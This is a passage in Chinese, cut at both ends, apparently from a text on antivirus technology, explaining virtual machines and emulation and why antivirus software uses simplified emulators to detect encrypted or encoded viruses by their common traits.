50、台真实地以该语言为机器代码的计算机,比如JAVA想做到跨平台兼容,那么每一种支持JAVA运行的计算机都要运行一个解释环境,这就是JAVA虚拟机;另一个含义是运行对应规则描述语言的机器并不是该描述语言的原设计机器,这种情况也称为仿真环境。在处理加密编码病毒过程中,虚拟机是比较理想的处理方法;在反病毒软件中引入虚拟机是由于综合分析了大多数已知病毒的共性,并基本可以认为在今后一段时间内的病毒大多会沿袭这些共性 虚拟机的确可以抓住一些病毒“经常使用的手段”和“常见的特点”,并以此来怀疑一个新的病毒;目前“临床”应用的虚拟机并不是“高大全”的完整仿真环境,而是相对比较简单的、易于实现的版本。虚拟机技术仍
